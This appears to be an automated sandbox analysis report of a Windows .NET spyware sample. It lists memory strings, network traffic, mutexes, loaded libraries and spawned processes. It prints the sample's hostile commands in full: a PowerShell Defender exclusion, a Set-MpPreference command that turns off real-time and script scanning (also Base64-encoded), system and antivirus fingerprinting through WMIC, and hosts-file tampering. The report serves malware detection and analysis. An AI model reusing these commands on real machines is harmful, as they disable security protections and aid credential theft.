            Source: powershell.exe, 00000002.00000002.1440681489.000001F9DDF84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1627400325.000001DED3ABC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1564105869.000001DEC5308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1627400325.000001DED3BF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1791808776.0000021A24D02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1675792920.0000021A1647A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1791808776.0000021A24BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 0000000E.00000002.1564105869.000001DEC4EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
            Source: powershell.exe, 0000000E.00000002.1564105869.000001DEC4EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
            Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
            Source: unknownHTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.9:49819 version: TLS 1.2

            Spam, unwanted Advertisements and Ransom Demands

            barindex
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887D2B8980_2_00007FF887D2B898
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887D440100_2_00007FF887D44010
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887D2B7E80_2_00007FF887D2B7E8
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887D1BF620_2_00007FF887D1BF62
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887D2B68D0_2_00007FF887D2B68D
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887D226440_2_00007FF887D22644
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887D2B5FA0_2_00007FF887D2B5FA
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887D282780_2_00007FF887D28278
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887D211580_2_00007FF887D21158
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887D449600_2_00007FF887D44960
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887D213380_2_00007FF887D21338
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887D212680_2_00007FF887D21268
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887D1FA480_2_00007FF887D1FA48
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887D31A100_2_00007FF887D31A10
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887D2B1F20_2_00007FF887D2B1F2
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887EDDCB00_2_00007FF887EDDCB0
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887EE4FFD0_2_00007FF887EE4FFD
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887EE07FA0_2_00007FF887EE07FA
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887EDFBF20_2_00007FF887EDFBF2
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887EE31F20_2_00007FF887EE31F2
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887ED75D60_2_00007FF887ED75D6
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887ED9DB80_2_00007FF887ED9DB8
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887EDAD150_2_00007FF887EDAD15
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887EDA8900_2_00007FF887EDA890
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887EE14550_2_00007FF887EE1455
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887ED24280_2_00007FF887ED2428
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887ED13E00_2_00007FF887ED13E0
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887EE13690_2_00007FF887EE1369
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887EE133C0_2_00007FF887EE133C
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887ED12A00_2_00007FF887ED12A0
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887ED12590_2_00007FF887ED1259
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887EE16430_2_00007FF887EE1643
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887EE1A000_2_00007FF887EE1A00
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887ED198D0_2_00007FF887ED198D
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887EDF9080_2_00007FF887EDF908
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF887DE32925_2_00007FF887DE3292
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FF887D282A918_2_00007FF887D282A9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FF887D2745618_2_00007FF887D27456
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000000.1345806847.000001EBB4D82000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename vs https___files.catbox.moe_l2rczc.pif.exe
            Source: https___files.catbox.moe_l2rczc.pif.exeBinary or memory string: OriginalFilename vs https___files.catbox.moe_l2rczc.pif.exe
            Source: https___files.catbox.moe_l2rczc.pif.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: https___files.catbox.moe_l2rczc.pif.exe, ------.csBase64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
            Source: TqmmU.scr.0.dr, ------.csBase64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
            Source: TqmmU.scr.0.dr, ------.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: TqmmU.scr.0.dr, ------.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: https___files.catbox.moe_l2rczc.pif.exe, ------.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: https___files.catbox.moe_l2rczc.pif.exe, ------.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.adwa.spyw.evad.winEXE@26/22@2/2
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\https___files.catbox.moe_l2rczc.pif.exe.logJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2600:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7676:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3444:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5224:120:WilError_03
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeMutant created: \Sessions\1\BaseNamedObjects\sW7ROjkdVeQ0ALYye0hE
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8116:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8188:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7920:120:WilError_03
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeFile created: C:\Users\user\AppData\Local\Temp\r261TDNGhrXeZRUJump to behavior
            Source: https___files.catbox.moe_l2rczc.pif.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: https___files.catbox.moe_l2rczc.pif.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB7154000.00000004.00000800.00020000.00000000.sdmp, https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB70AA000.00000004.00000800.00020000.00000000.sdmp, PCiD1mTvfGuUXvw.0.dr, uQfvaSafMkyhIlj.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: https___files.catbox.moe_l2rczc.pif.exeReversingLabs: Detection: 91%
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeFile read: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe "C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe"
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get Caption
            Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemory
            Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
            Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get name
            Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-WmiObject -Namespace "Root\SecurityCenter2" -Class AntiVirusProduct | Select-Object -ExpandProperty displayName
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe'Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get CaptionJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemoryJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIERJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get nameJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-WmiObject -Namespace "Root\SecurityCenter2" -Class AntiVirusProduct | Select-Object -ExpandProperty displayNameJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
